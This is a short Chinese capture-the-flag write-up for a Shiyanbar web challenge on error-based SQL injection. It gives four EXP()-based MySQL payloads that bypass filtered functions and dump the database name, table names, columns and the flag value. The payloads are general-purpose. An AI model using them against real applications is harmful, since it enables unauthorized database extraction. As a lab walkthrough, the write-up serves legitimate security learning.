实验吧web-简单的sql注入之3

题目地址:http://ctf5.shiyanbar.com/web/index_3.php

题目提示了这道题是sql报错注入,那就先试试吧

上网找到报错注入的函数,尝试发现floor,extractvalue,updatexml被吃掉了,那就用exp

爆库名:'or EXP(~(SELECT * from(select database())a))#


实验吧web-简单的sql注入之3_第1张图片

爆表名:'or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#


实验吧web-简单的sql注入之3_第2张图片

看来flag应该在flag表里了

爆列名:'or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#


实验吧web-简单的sql注入之3_第3张图片

getflag:'or EXP(~(SELECT * from(select group_concat(flag) from flag)a))#


实验吧web-简单的sql注入之3_第4张图片

the end

你可能感兴趣的:(实验吧web-简单的sql注入之3)